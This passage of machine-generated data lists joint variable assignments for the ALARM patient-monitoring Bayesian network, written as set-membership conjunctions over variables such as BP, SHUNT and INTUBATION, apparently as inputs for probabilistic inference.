(PVSAT << {'HIGH'}) & (SAO2 << {'NORMAL'}) & (SHUNT << {'NORMAL'}) & (STROKEVOLUME << {'NORMAL'}) & (TPR << {'HIGH'}) & (VENTALV << {'LOW'}) & (VENTLUNG << {'LOW'}) & (VENTMACH << {'NORMAL'}) & (VENTTUBE << {'ZERO'}),(ANAPHYLAXIS << {'TRUE'}) & (ARTCO2 << {'LOW'}) & (BP << {'HIGH'}) & (CATECHOL << {'HIGH'}) & (CO << {'LOW'}) & (CVP << {'LOW'}) & (DISCONNECT << {'FALSE'}) & (ERRCAUTER << {'FALSE'}) & (ERRLOWOUTPUT << {'FALSE'}) & (EXPCO2 << {'HIGH'}) & (FIO2 << {'NORMAL'}) & (HISTORY << {'TRUE'}) & (HR << {'NORMAL'}) & (HRBP << {'NORMAL'}) & (HREKG << {'NORMAL'}) & (HRSAT << {'LOW'}) & (HYPOVOLEMIA << {'TRUE'}) & (INSUFFANESTH << {'FALSE'}) & (INTUBATION << {'NORMAL'}) & (KINKEDTUBE << {'FALSE'}) & (LVEDVOLUME << {'NORMAL'}) & (LVFAILURE << {'TRUE'}) & (MINVOL << {'LOW'}) & (MINVOLSET << {'LOW'}) & (PAP << {'LOW'}) & (PCWP << {'HIGH'}) & (PRESS << {'ZERO'}) & (PULMEMBOLUS << {'TRUE'}) & (PVSAT << {'NORMAL'}) & (SAO2 << {'LOW'}) & (SHUNT << {'HIGH'}) & (STROKEVOLUME << {'NORMAL'}) & (TPR << {'LOW'}) & (VENTALV << {'LOW'}) & (VENTLUNG << {'ZERO'}) & (VENTMACH << {'NORMAL'}) & (VENTTUBE << {'ZERO'}),(ANAPHYLAXIS << {'TRUE'}) & (ARTCO2 << {'HIGH'}) & (BP << {'HIGH'}) & (CATECHOL << {'NORMAL'}) & (CO << {'HIGH'}) & (CVP << {'LOW'}) & (DISCONNECT << {'FALSE'}) & (ERRCAUTER << {'FALSE'}) & (ERRLOWOUTPUT << {'FALSE'}) & (EXPCO2 << {'LOW'}) & (FIO2 << {'LOW'}) & (HISTORY << {'FALSE'}) & (HR << {'LOW'}) & (HRBP << {'LOW'}) & (HREKG << {'HIGH'}) & (HRSAT << {'HIGH'}) & (HYPOVOLEMIA << {'FALSE'}) & (INSUFFANESTH << {'TRUE'}) & (INTUBATION << {'ONESIDED'}) & (KINKEDTUBE << {'FALSE'}) & (LVEDVOLUME << {'LOW'}) & (LVFAILURE << {'FALSE'}) & (MINVOL << {'HIGH'}) & (MINVOLSET << {'HIGH'}) & (PAP << {'NORMAL'}) & (PCWP << {'NORMAL'}) & (PRESS << {'HIGH'}) & (PULMEMBOLUS << {'TRUE'}) & (PVSAT << {'LOW'}) & (SAO2 << {'NORMAL'}) & (SHUNT << {'NORMAL'}) & (STROKEVOLUME << {'HIGH'}) & (TPR << {'NORMAL'}) & (VENTALV << {'NORMAL'}) & (VENTLUNG << {'LOW'}) & (VENTMACH << {'HIGH'}) & (VENTTUBE << {'ZERO'}),(ANAPHYLAXIS << {'FALSE'}) & (ARTCO2 << {'HIGH'}) & (BP << {'LOW'}) & (CATECHOL << {'HIGH'}) & (CO << {'HIGH'}) & (CVP << {'NORMAL'}) & (DISCONNECT << {'TRUE'}) & (ERRCAUTER << {'TRUE'}) & (ERRLOWOUTPUT << {'TRUE'}) & (EXPCO2 << {'ZERO'}) & (FIO2 << {'LOW'}) & (HISTORY << {'TRUE'}) & (HR << {'HIGH'}) & (HRBP << {'HIGH'}) & (HREKG << {'LOW'}) & (HRSAT << {'LOW'}) & (HYPOVOLEMIA << {'TRUE'}) & (INSUFFANESTH << {'TRUE'}) & (INTUBATION << {'ONESIDED'}) & (KINKEDTUBE << {'FALSE'}) & (LVEDVOLUME << {'HIGH'}) & (LVFAILURE << {'TRUE'}) & (MINVOL << {'HIGH'}) & (MINVOLSET << {'LOW'}) & (PAP << {'HIGH'}) & (PCWP << {'NORMAL'}) & (PRESS << {'LOW'}) & (PULMEMBOLUS << {'FALSE'}) & (PVSAT << {'HIGH'}) & (SAO2 << {'LOW'}) & (SHUNT << {'HIGH'}) & (STROKEVOLUME << {'LOW'}) & (TPR << {'LOW'}) & (VENTALV << {'ZERO'}) & (VENTLUNG << {'LOW'}) & (VENTMACH << {'ZERO'}) & (VENTTUBE << {'LOW'}),(ANAPHYLAXIS << {'FALSE'}) & (ARTCO2 << {'LOW'}) & (BP << {'NORMAL'}) & (CATECHOL << {'HIGH'}) & (CO << {'NORMAL'}) & (CVP << {'NORMAL'}) & (DISCONNECT << {'FALSE'}) & (ERRCAUTER << {'TRUE'}) & (ERRLOWOUTPUT << {'TRUE'}) & (EXPCO2 << {'ZERO'}) & (FIO2 << {'LOW'}) & (HISTORY << {'FALSE'}) & (HR << {'NORMAL'}) & (HRBP << {'LOW'}) & (HREKG << {'LOW'}) & (HRSAT << {'LOW'}) & (HYPOVOLEMIA << {'FALSE'}) & (INSUFFANESTH << {'TRUE'}) & (INTUBATION << {'ONESIDED'}) & (KINKEDTUBE << {'TRUE'}) & (LVEDVOLUME << {'NORMAL'}) & (LVFAILURE << {'FALSE'}) & (MINVOL << {'ZERO'}) & (MINVOLSET << {'HIGH'}) & (PAP << {'LOW'}) & (PCWP << {'NORMAL'}) & (PRESS << {'NORMAL'}) & (PULMEMBOLUS << {'TRUE'}) & (PVSAT << {'HIGH'}) & (SAO2 << {'LOW'}) & (SHUNT << {'HIGH'}) & (STROKEVOLUME << {'HIGH'}) & (TPR << {'NORMAL'}) & (VENTALV << {'NORMAL'}) & (VENTLUNG << {'ZERO'}) & (VENTMACH << {'NORMAL'}) & (VENTTUBE << {'LOW'}),(ANAPHYLAXIS << {'FALSE'}) & (ARTCO2 << {'LOW'}) & (BP << {'NORMAL'}) & (CATECHOL << {'NORMAL'}) & (CO << {'NORMAL'}) & (CVP << {'HIGH'}) & (DISCONNECT << {'FALSE'}) & (ERRCAUTER << {'TRUE'}) & (ERRLOWOUTPUT << {'TRUE'}) & (EXPCO2 << {'NORMAL'}) & (FIO2 << {'LOW'}) & (HISTORY << {'TRUE'}) & (HR << {'HIGH'}) & (HRBP << {'NORMAL'}) & (HREKG << {'LOW'}) & (HRSAT << {'HIGH'}) & (HYPOVOLEMIA << {'TRUE'}) & (INSUFFANESTH << {'FALSE'}) & (INTUBATION << {'NORMAL'}) & (KINKEDTUBE << {'TRUE'}) & (LVEDVOLUME << {'LOW'}) & (LVFAILURE << {'FALSE'}) & (MINVOL << {'ZERO'}) & (MINVOLSET << {'NORMAL'}) & (PAP << {'LOW'}) & (PCWP << {'NORMAL'}) & (PRESS << {'ZERO'}) & (PULMEMBOLUS << {'TRUE'}) & (PVSAT << {'LOW'}) & (SAO2 << {'LOW'}) & (SHUNT << {'NORMAL'}) & (STROKEVOLUME << {'HIGH'}) & (TPR << {'HIGH'}) & (VENTALV << {'NORMAL'}) & (VENTLUNG << {'NORMAL'}) & (VENTMACH << {'NORMAL'}) & (VENTTUBE << {'HIGH'}),(ANAPHYLAXIS << {'FALSE'}) & (ARTCO2 << {'LOW'}) & (BP << {'NORMAL'}) & (CATECHOL << {'HIGH'}) & (CO << {'LOW'}) & (CVP << {'NORMAL'}) & (DISCONNECT << {'TRUE'}) & (ERRCAUTER << {'TRUE'}) & (ERRLOWOUTPUT << {'FALSE'}) & (EXPCO2 << {'HIGH'}) & (FIO2 << {'LOW'}) & (HISTORY << {'FALSE'}) & (HR << {'NORMAL'}) & (HRBP << {'NORMAL'}) & (HREKG << {'LOW'}) & (HRSAT << {'HIGH'}) & (HYPOVOLEMIA << {'TRUE'}) & (INSUFFANESTH << {'FALSE'}) & (INTUBATION << {'NORMAL'}) & (KINKEDTUBE << {'TRUE'}) & (LVEDVOLUME << {'NORMAL'}) & (LVFAILURE << {'TRUE'}) & (MINVOL << {'LOW'}) & (MINVOLSET << {'LOW'}) & (PAP << {'NORMAL'}) & (PCWP << {'NORMAL'}) & (PRESS << {'LOW'}) & (PULMEMBOLUS << {'FALSE'}) & (PVSAT << {'HIGH'}) & (SAO2 << {'NORMAL'}) & (SHUNT << {'NORMAL'}) & (STROKEVOLUME << {'HIGH'}) & (TPR << {'LOW'}) & (VENTALV << {'NORMAL'}) & (VENTLUNG << {'NORMAL'}) & (VENTMACH << {'ZERO'}) & (VENTTUBE << {'ZERO'}),(ANAPHYLAXIS << {'TRUE'}) & (ARTCO2 << {'NORMAL'}) & (BP << {'LOW'}) & (CATECHOL << {'NORMAL'}) & (CO << {'LOW'}) & (CVP << {'HIGH'}) & (DISCONNECT << {'TRUE'}) & (ERRCAUTER << {'TRUE'}) & (ERRLOWOUTPUT << {'TRUE'}) & (EXPCO2 << {'HIGH'}) & (FIO2 << {'LOW'}) & (HISTORY << {'TRUE'}) & (HR << {'NORMAL'}) & (HRBP << {'LOW'}) & (HREKG << {'HIGH'}) & (HRSAT << {'LOW'}) & (HYPOVOLEMIA << {'TRUE'}) & (INSUFFANESTH << {'FALSE'}) & (INTUBATION << {'ONESIDED'}) & (KINKEDTUBE << {'FALSE'}) & (LVEDVOLUME << {'NORMAL'}) & (LVFAILURE << {'TRUE'}) & (MINVOL << {'NORMAL'}) & (MINVOLSET << {'LOW'}) & (PAP << {'LOW'}) & (PCWP << {'HIGH'}) & (PRESS << {'NORMAL'}) & (PULMEMBOLUS << {'TRUE'}) & (PVSAT << {'HIGH'}) & (SAO2 << {'LOW'}) & (SHUNT << {'NORMAL'}) & (STROKEVOLUME << {'LOW'}) & (TPR << {'LOW'}) & (VENTALV << {'HIGH'}) & (VENTLUNG << {'NORMAL'}) & (VENTMACH << {'NORMAL'}) & (VENTTUBE << {'LOW'}),(ANAPHYLAXIS << {'FALSE'}) & (ARTCO2 << {'LOW'}) & (BP << {'LOW'}) & (CATECHOL << {'HIGH'}) & (CO << {'LOW'}) & (CVP << {'NORMAL'}) & (DISCONNECT << {'FALSE'}) & (ERRCAUTER << {'TRUE'}) & (ERRLOWOUTPUT << {'TRUE'}) & (EXPCO2 << {'HIGH'}) & (FIO2 << {'NORMAL'}) & (HISTORY << {'TRUE'}) & (HR << {'NORMAL'}) & (HRBP << {'NORMAL'}) & (HREKG << {'LOW'}) & (HRSAT << {'LOW'}) & (HYPOVOLEMIA << {'FALSE'}) & (INSUFFANESTH << {'FALSE'}) & (INTUBATION << {'NORMAL'}) & (KINKEDTUBE << {'TRUE'}) & (LVEDVOLUME << {'NORMAL'}) & (LVFAILURE << {'FALSE'}) & (MINVOL << {'NORMAL'}) & (MINVOLSET << {'HIGH'}) & (PAP << {'LOW'}) & (PCWP << {'NORMAL'}) & (PRESS << {'ZERO'}) & (PULMEMBOLUS << {'FALSE'}) & (PVSAT << {'HIGH'}) & (SAO2 << {'NORMAL'}) & (SHUNT << {'HIGH'}) & (STROKEVOLUME << {'LOW'}) & (TPR << {'HIGH'}) & (VENTALV << {'HIGH'}) & (VENTLUNG << {'LOW'}) & (VENTMACH << {'LOW'}) & (VENTTUBE << {'ZERO'}),(ANAPHYLAXIS << {'TRUE'}) & (ARTCO2 << {'LOW'}) & (BP << {'NORMAL'}) & (CATECHOL << {'HIGH'}) & (CO << {'HIGH'}) & (CVP << {'LOW'}) & (DISCONNECT << {'FALSE'}) & (ERRCAUTER << {'TRUE'}) & (ERRLOWOUTPUT << {'TRUE'}) & (EXPCO2 << {'LOW'}) & (FIO2 << {'LOW'}) & (HISTORY << {'FALSE'}) & (HR << {'HIGH'}) & (HRBP << {'HIGH'}) & (HREKG << {'LOW'}) & (HRSAT << {'HIGH'}) & (HYPOVOLEMIA << {'TRUE'}) & (INSUFFANESTH << {'TRUE'}) & (INTUBATION << {'ONESIDED'}) & (KINKEDTUBE << {'TRUE'}) & (LVEDVOLUME << {'LOW'}) & (LVFAILURE << {'FALSE'}) & (MINVOL << {'HIGH'}) & (MINVOLSET << {'HIGH'}) & (PAP << {'HIGH'}) & (PCWP << {'NORMAL'}) & (PRESS << {'ZERO'}) & (PULMEMBOLUS << {'TRUE'}) & (PVSAT << {'NORMAL'}) & (SAO2 << {'NORMAL'}) & (SHUNT << {'NORMAL'}) & (STROKEVOLUME << {'NORMAL'}) & (TPR << {'HIGH'}) & (VENTALV << {'LOW'}) & (VENTLUNG << {'ZERO'}) & (VENTMACH << {'LOW'}) & (VENTTUBE << {'ZERO'}),(ANAPHYLAXIS << {'FALSE'}) & (ARTCO2 << {'NORMAL'}) & (BP << {'LOW'}) & (CATECHOL << {'HIGH'}) & (CO << {'HIGH'}) & (CVP << {'NORMAL'}) & (DISCONNECT << {'FALSE'}) & (ERRCAUTER << {'TRUE'}) & (ERRLOWOUTPUT << {'TRUE'}) & (EXPCO2 << {'HIGH'}) & (FIO2 << {'NORMAL'}) & (HISTORY << {'FALSE'}) & (HR << {'LOW'}) & (HRBP << {'NORMAL'}) & (HREKG << {'LOW'}) & (HRSAT << {'HIGH'}) & (HYPOVOLEMIA << {'TRUE'}) & (INSUFFANESTH << {'FALSE'}) & (INTUBATION << {'ESOPHAGEAL'}) & (KINKEDTUBE << {'FALSE'}) & (LVEDVOLUME << {'NORMAL'}) & (LVFAILURE << {'FALSE'}) & (MINVOL << {'LOW'}) & (MINVOLSET << {'NORMAL'}) & (PAP << {'LOW'}) & (PCWP << {'LOW'}) & (PRESS << {'LOW'}) & (PULMEMBOLUS << {'FALSE'}) & (PVSAT << {'HIGH'}) & (SAO2 << {'LOW'}) & (SHUNT << {'NORMAL'}) & (STROKEVOLUME << {'LOW'}) & (TPR << {'NORMAL'}) & (VENTALV << {'ZERO'}) & (VENTLUNG << {'NORMAL'}) & (VENTMACH << {'ZERO'}) & (VENTTUBE << {'HIGH'}),(ANAPHYLAXIS << {'TRUE'}) & (ARTCO2 << {'HIGH'}) & (BP << {'NORMAL'}) & (CATECHOL << {'HIGH'}) & (CO << {'HIGH'}) & (CVP << {'HIGH'}) & (DISCONNECT << {'TRUE'}) & (ERRCAUTER << {'TRUE'}) & (ERRLOWOUTPUT << {'FALSE'}) & (EXPCO2 << {'ZERO'}) & (FIO2 << {'LOW'}) & (HISTORY << {'TRUE'}) & (HR << {'NORMAL'}) & (HRBP << {'NORMAL'}) & (HREKG << {'NORMAL'}) & (HRSAT << {'NORMAL'}) & (HYPOVOLEMIA << {'TRUE'}) & (INSUFFANESTH << {'TRUE'}) & (INTUBATION << {'NORMAL'}) & (KINKEDTUBE << {'TRUE'}) & (LVEDVOLUME << {'LOW'}) & (LVFAILURE << {'FALSE'}) & (MINVOL << {'LOW'}) & (MINVOLSET << {'HIGH'}) & (PAP << {'HIGH'}) & (PCWP << {'NORMAL'}) & (PRESS << {'ZERO'}) & (PULMEMBOLUS << {'FALSE'}) & (PVSAT << {'NORMAL'}) & (SAO2 << {'NORMAL'}) & (SHUNT << {'HIGH'}) & (STROKEVOLUME << {'NORMAL'}) & (TPR << {'LOW'}) & (VENTALV << {'NORMAL'}) & (VENTLUNG << {'ZERO'}) & (VENTMACH << {'LOW'}) & (VENTTUBE << {'NORMAL'}),(ANAPHYLAXIS << {'FALSE'}) & (ARTCO2 << {'LOW'}) & (BP << {'NORMAL'}) & (CATECHOL << {'NORMAL'}) & (CO << {'NORMAL'}) & (CVP << {'HIGH'}) & (DISCONNECT << {'FALSE'}) & (ERRCAUTER << {'TRUE'}) & (ERRLOWOUTPUT << {'TRUE'}) & (EXPCO2 << {'NORMAL'}) & (FIO2 << {'NORMAL'}) & (HISTORY << {'FALSE'}) & (HR << {'NORMAL'}) & (HRBP << {'NORMAL'}) & (HREKG << {'LOW'}) & (HRSAT << {'NORMAL'}) & (HYPOVOLEMIA << {'FALSE'}) & (INSUFFANESTH << {'FALSE'}) & (INTUBATION << {'NORMAL'}) & (KINKEDTUBE << {'FALSE'}) & (LVEDVOLUME << {'NORMAL'}) & (LVFAILURE << {'TRUE'}) & (MINVOL << {'ZERO'}) & (MINVOLSET << {'HIGH'}) & (PAP << {'LOW'}) & (PCWP << {'NORMAL'}) & (PRESS << {'LOW'}) & (PULMEMBOLUS << {'FALSE'}) & (PVSAT << {'HIGH'}) & (SAO2 << {'NORMAL'}) & (SHUNT << {'HIGH'}) & (STROKEVOLUME << {'HIGH'}) & (TPR << {'LOW'}) & (VENTALV << {'HIGH'}) & (VENTLUNG << {'HIGH'}) & (VENTMACH << {'ZERO'}) & (VENTTUBE << {'ZERO'}),(ANAPHYLAXIS << {'FALSE'}) & (ARTCO2 << {'NORMAL'}) & (BP << {'LOW'}) & (CATECHOL << {'NORMAL'}) & (CO << {'HIGH'}) & (CVP << {'HIGH'}) & (DISCONNECT << {'TRUE'}) & (ERRCAUTER << {'FALSE'}) & (ERRLOWOUTPUT << {'TRUE'}) & (EXPCO2 << {'NORMAL'}) & (FIO2 << {'NORMAL'}) & (HISTORY << {'FALSE'}) & (HR << {'HIGH'}) & (HRBP << {'NORMAL'}) & (HREKG << {'LOW'}) & (HRSAT << {'NORMAL'}) & (HYPOVOLEMIA << {'FALSE'}) & (INSUFFANESTH << {'TRUE'}) & (INTUBATION << {'NORMAL'}) & (KINKEDTUBE << {'FALSE'}) & (LVEDVOLUME << {'NORMAL'}) & (LVFAILURE << {'FALSE'}) & (MINVOL << {'LOW'}) & (MINVOLSET << {'NORMAL'}) & (PAP << {'NORMAL'}) & (PCWP << {'NORMAL'}) & (PRESS << {'ZERO'}) & (PULMEMBOLUS << {'FALSE'}) & (PVSAT << {'LOW'}) & (SAO2 << {'HIGH'}) & (SHUNT << {'HIGH'}) & (STROKEVOLUME << {'LOW'}) & (TPR << {'HIGH'}) & (VENTALV << {'NORMAL'}) & (VENTLUNG << {'HIGH'}) & (VENTMACH << {'NORMAL'}) & (VENTTUBE << {'LOW'}),(ANAPHYLAXIS << {'FALSE'}) & (ARTCO2 << {'LOW'}) & (BP << {'LOW'}) & (CATECHOL << {'NORMAL'}) & (CO << {'LOW'}) & (CVP << {'NORMAL'}) & (DISCONNECT << {'FALSE'}) & (ERRCAUTER << {'TRUE'}) & (ERRLOWOUTPUT << {'FALSE'}) & (EXPCO2 << {'ZERO'}) & (FIO2 << {'LOW'}) & (HISTORY << {'FALSE'}) & (HR << {'HIGH'}) & (HRBP << {'LOW'}) & (HREKG << {'NORMAL'}) & (HRSAT << {'LOW'}) & (HYPOVOLEMIA << {'TRUE'}) & (INSUFFANESTH << {'FALSE'}) & (INTUBATION << {'ESOPHAGEAL'}) & (KINKEDTUBE << {'FALSE'}) & (LVEDVOLUME << {'LOW'}) & (LVFAILURE << {'TRUE'}) & (MINVOL << {'NORMAL'}) & (MINVOLSET << {'LOW'}) & (PAP << {'NORMAL'}) & (PCWP << {'HIGH'}) & (PRESS << {'ZERO'}) & (PULMEMBOLUS << {'FALSE'}) & (PVSAT << {'LOW'}) & (SAO2 << {'NORMAL'}) & (SHUNT << {'HIGH'}) & (STROKEVOLUME << {'LOW'}) & (TPR << {'LOW'}) & (VENTALV << {'NORMAL'}) & (VENTLUNG << {'ZERO'}) & (VENTMACH << {'ZERO'}) & (VENTTUBE << {'NORMAL'}),(ANAPHYLAXIS << {'FALSE'}) & (ARTCO2 << {'HIGH'}) & (BP << {'LOW'}) & (CATECHOL << {'NORMAL'}) & (CO << {'LOW'}) & (CVP << {'HIGH'}) & (DISCONNECT << {'FALSE'}) & (ERRCAUTER << {'TRUE'}) & (ERRLOWOUTPUT << {'TRUE'}) & (EXPCO2 << {'ZERO'}) & (FIO2 << {'LOW'}) & (HISTORY << {'TRUE'}) & (HR << {'LOW'}) & (HRBP << {'LOW'}) & (HREKG << {'HIGH'}) & (HRSAT << {'HIGH'}) & (HYPOVOLEMIA << {'FALSE'}) & (INSUFFANESTH << {'TRUE'}) & (INTUBATION << {'NORMAL'}) & (KINKEDTUBE << {'TRUE'}) & (LVEDVOLUME << {'NORMAL'}) & (LVFAILURE << {'TRUE'}) & (MINVOL << {'LOW'}) & (MINVOLSET << {'LOW'}) & (PAP << {'LOW'}) & (PCWP << {'LOW'}) & (PRESS << {'NORMAL'}) & (PULMEMBOLUS << {'TRUE'}) & (PVSAT << {'LOW'}) & (SAO2 << {'LOW'}) & (SHUNT << {'HIGH'}) & (STROKEVOLUME << {'LOW'}) & (TPR << {'HIGH'}) & (VENTALV << {'NORMAL'}) & (VENTLUNG << {'ZERO'}) & (VENTMACH << {'LOW'}) & (VENTTUBE << {'NORMAL'}),(ANAPHYLAXIS << {'TRUE'}) & (ARTCO2 << {'HIGH'}) & (BP << {'NORMAL'}) & (CATECHOL << {'NORMAL'}) & (CO << {'LOW'}) & (CVP << {'LOW'}) & (DISCONNECT << {'FALSE'}) & (ERRCAUTER << {'FALSE'}) & (ERRLOWOUTPUT << {'FALSE'}) & (EXPCO2 << {'ZERO'}) & (FIO2 << {'LOW'}) & (HISTORY << {'FALSE'}) & (HR << {'HIGH'}) & (HRBP << {'HIGH'}) & (HREKG << {'HIGH'}) & (HRSAT << {'NORMAL'}) & (HYPOVOLEMIA << {'FALSE'}) & (INSUFFANESTH << {'TRUE'}) & (INTUBATION << {'ESOPHAGEAL'}) & (KINKEDTUBE << {'FALSE'}) & (LVEDVOLUME << {'HIGH'}) & (LVFAILURE << {'FALSE'}) & (MINVOL << {'NORMAL'}) & (MINVOLSET << {'NORMAL'}) & (PAP << {'HIGH'}) & (PCWP << {'LOW'}) & (PRESS << {'LOW'}) & (PULMEMBOLUS << {'TRUE'}) & (PVSAT << {'HIGH'}) & (SAO2 << {'LOW'}) & (SHUNT << {'NORMAL'}) & (STROKEVOLUME << {'LOW'}) & (TPR << {'NORMAL'}) & (VENTALV << {'ZERO'}) & (VENTLUNG << {'ZERO'}) & (VENTMACH << {'HIGH'}) & (VENTTUBE << {'LOW'}),(ANAPHYLAXIS << {'FALSE'}) & (ARTCO2 << {'NORMAL'}) & (BP << {'NORMAL'}) & (CATECHOL << {'HIGH'}) & (CO << {'HIGH'}) & (CVP << {'NORMAL'}) & (DISCONNECT << {'FALSE'}) & (ERRCAUTER << {'FALSE'}) & (ERRLOWOUTPUT << {'TRUE'}) & (EXPCO2 << {'ZERO'}) & (FIO2 << {'LOW'}) & (HISTORY << {'FALSE'}) & (HR << {'LOW'}) & (HRBP << {'NORMAL'}) & (HREKG << {'HIGH'}) & (HRSAT << {'HIGH'}) & (HYPOVOLEMIA << {'TRUE'}) & (INSUFFANESTH << {'TRUE'}) & (INTUBATION << {'ESOPHAGEAL'}) & (KINKEDTUBE << {'FALSE'}) & (LVEDVOLUME << {'LOW'}) & (LVFAILURE << {'FALSE'}) & (MINVOL << {'NORMAL'}) & (MINVOLSET << {'LOW'}) & (PAP << {'NORMAL'}) & (PCWP << {'NORMAL'}) & (PRESS << {'LOW'}) & (PULMEMBOLUS << {'TRUE'}) & (PVSAT << {'HIGH'}) & (SAO2 << {'NORMAL'}) & (SHUNT << {'HIGH'}) & (STROKEVOLUME << {'NORMAL'}) & (TPR << {'NORMAL'}) & (VENTALV << {'HIGH'}) & (VENTLUNG << {'ZERO'}) & (VENTMACH << {'ZERO'}) & (VENTTUBE << {'HIGH'}),(ANAPHYLAXIS << {'FALSE'}) & (ARTCO2 << {'NORMAL'}) & (BP << {'NORMAL'}) & (CATECHOL << {'HIGH'}) & (CO << {'HIGH'}) & (CVP << {'HIGH'}) & (DISCONNECT << {'FALSE'}) & (ERRCAUTER << {'FALSE'}) & (ERRLOWOUTPUT << {'TRUE'}) & (EXPCO2 << {'HIGH'}) & (FIO2 << {'LOW'}) & (HISTORY << {'FALSE'}) & (HR << {'LOW'}) & (HRBP << {'NORMAL'}) & (HREKG << {'NORMAL'}) & (HRSAT << {'LOW'}) & (HYPOVOLEMIA << {'TRUE'}) & (INSUFFANESTH << {'FALSE'}) & (INTUBATION << {'NORMAL'}) & (KINKEDTUBE << {'TRUE'}) & (LVEDVOLUME << {'LOW'}) & (LVFAILURE << {'TRUE'}) & (MINVOL << {'HIGH'}) & (MINVOLSET << {'NORMAL'}) & (PAP << {'NORMAL'}) & (PCWP << {'HIGH'}) & (PRESS << {'HIGH'}) & (PULMEMBOLUS << {'FALSE'}) & (PVSAT << {'LOW'}) & (SAO2 << {'HIGH'}) & (SHUNT << {'NORMAL'}) & (STROKEVOLUME << {'NORMAL'}) & (TPR << {'NORMAL'}) & (VENTALV << {'ZERO'}) & (VENTLUNG << {'NORMAL'}) & (VENTMACH << {'HIGH'}) & (VENTTUBE << {'HIGH'}),(ANAPHYLAXIS << {'TRUE'}) & (ARTCO2 << {'HIGH'}) & (BP << {'LOW'}) & (CATECHOL << {'NORMAL'}) & (CO << {'LOW'}) & (CVP << {'HIGH'}) & (DISCONNECT << {'FALSE'}) & (ERRCAUTER << {'TRUE'}) & (ERRLOWOUTPUT << {'TRUE'}) & (EXPCO2 << {'NORMAL'}) & (FIO2 << {'NORMAL'}) & (HISTORY << {'FALSE'}) & (HR << {'NORMAL'}) & (HRBP << {'HIGH'}) & (HREKG << {'NORMAL'}) & (HRSAT << {'HIGH'}) & (HYPOVOLEMIA << {'FALSE'}) & (INSUFFANESTH << {'TRUE'}) & (INTUBATION << {'ESOPHAGEAL'}) & (KINKEDTUBE << {'TRUE'}) & (LVEDVOLUME << {'HIGH'}) & (LVFAILURE << {'FALSE'}) & (MINVOL << {'LOW'}) & (MINVOLSET << {'NORMAL'}) & (PAP << {'LOW'}) & (PCWP << {'HIGH'}) & (PRESS << {'LOW'}) & (PULMEMBOLUS << {'TRUE'}) & (PVSAT << {'HIGH'}) & (SAO2 << {'LOW'}) & (SHUNT << {'NORMAL'}) & (STROKEVOLUME << {'LOW'}) & (TPR << {'LOW'}) & (VENTALV << {'ZERO'}) & (VENTLUNG << {'NORMAL'}) & (VENTMACH << {'LOW'}) & (VENTTUBE << {'LOW'}),(ANAPHYLAXIS << {'FALSE'}) & (ARTCO2 << {'HIGH'}) & (BP << {'NORMAL'}) & (CATECHOL << {'HIGH'}) & (CO << {'LOW'}) & (CVP << {'HIGH'}) & (DISCONNECT << {'FALSE'}) & (ERRCAUTER << {'FALSE'}) & (ERRLOWOUTPUT << {'TRUE'}) & (EXPCO2 << {'HIGH'}) & (FIO2 << {'LOW'}) & (HISTORY << {'FALSE'}) & (HR << {'HIGH'}) & (HRBP << {'LOW'}) & (HREKG << {'LOW'}) & (HRSAT << {'NORMAL'}) & (HYPOVOLEMIA << {'TRUE'}) & (INSUFFANESTH << {'FALSE'}) & (INTUBATION << {'NORMAL'}) & (KINKEDTUBE << {'TRUE'}) & (LVEDVOLUME << {'NORMAL'}) & (LVFAILURE << {'TRUE'}) & (MINVOL << {'HIGH'}) & (MINVOLSET << {'NORMAL'}) & (PAP << {'HIGH'}) & (PCWP << {'NORMAL'}) & (PRESS << {'LOW'}) & (PULMEMBOLUS << {'FALSE'}) & (PVSAT << {'NORMAL'}) & (SAO2 << {'HIGH'}) & (SHUNT << {'NORMAL'}) & (STROKEVOLUME << {'NORMAL'}) & (TPR << {'LOW'}) & (VENTALV << {'LOW'}) & (VENTLUNG << {'NORMAL'}) & (VENTMACH << {'LOW'}) & (VENTTUBE << {'HIGH'}),(ANAPHYLAXIS << {'FALSE'}) & (ARTCO2 << {'NORMAL'}) & (BP << {'LOW'}) & (CATECHOL << {'HIGH'}) & (CO << {'NORMAL'}) & (CVP << {'HIGH'}) & (DISCONNECT << {'FALSE'}) & (ERRCAUTER << {'TRUE'}) & (ERRLOWOUTPUT << {'FALSE'}) & (EXPCO2 << {'HIGH'}) & (FIO2 << {'LOW'}) & (HISTORY << {'FALSE'}) & (HR << {'HIGH'}) & (HRBP << {'LOW'}) & (HREKG << {'HIGH'}) & (HRSAT << {'HIGH'}) & (HYPOVOLEMIA << {'FALSE'}) & (INSUFFANESTH << {'FALSE'}) & (INTUBATION << {'ONESIDED'}) & (KINKEDTUBE << {'FALSE'}) & (LVEDVOLUME << {'LOW'}) & (LVFAILURE << {'TRUE'}) & (MINVOL << {'NORMAL'}) & (MINVOLSET << {'HIGH'}) & (PAP << {'LOW'}) & (PCWP << {'HIGH'}) & (PRESS << {'LOW'}) & (PULMEMBOLUS << {'TRUE'}) & (PVSAT << {'HIGH'}) & (SAO2 << {'NORMAL'}) & (SHUNT << {'NORMAL'}) & (STROKEVOLUME << {'LOW'}) & (TPR << {'HIGH'}) & (VENTALV << {'LOW'}) & (VENTLUNG << {'ZERO'}) & (VENTMACH << {'HIGH'}) & (VENTTUBE << {'ZERO'}),(ANAPHYLAXIS << {'FALSE'}) & (ARTCO2 << {'HIGH'}) & (BP << {'NORMAL'}) & (CATECHOL << {'NORMAL'}) & (CO << {'HIGH'}) & (CVP << {'LOW'}) & (DISCONNECT << {'TRUE'}) & (ERRCAUTER << {'TRUE'}) & (ERRLOWOUTPUT << {'FALSE'}) & (EXPCO2 << {'NORMAL'}) & (FIO2 << {'LOW'}) & (HISTORY << {'TRUE'}) & (HR << {'HIGH'}) & (HRBP << {'NORMAL'}) & (HREKG << {'HIGH'}) & (HRSAT << {'LOW'}) & (HYPOVOLEMIA << {'TRUE'}) & (INSUFFANESTH << {'TRUE'}) & (INTUBATION << {'NORMAL'}) & (KINKEDTUBE << {'TRUE'}) & (LVEDVOLUME << {'HIGH'}) & (LVFAILURE << {'FALSE'}) & (MINVOL << {'ZERO'}) & (MINVOLSET << {'NORMAL'}) & (PAP << {'HIGH'}) & (PCWP << {'LOW'}) & (PRESS << {'HIGH'}) & (PULMEMBOLUS << {'TRUE'}) & (PVSAT << {'NORMAL'}) & (SAO2 << {'HIGH'}) & (SHUNT << {'HIGH'}) & (STROKEVOLUME << {'NORMAL'}) & (TPR << {'LOW'}) & (VENTALV << {'NORMAL'}) & (VENTLUNG << {'HIGH'}) & (VENTMACH << {'LOW'}) & (VENTTUBE << {'ZERO'}),(ANAPHYLAXIS << {'TRUE'}) & (ARTCO2 << {'NORMAL'}) & (BP << {'LOW'}) & 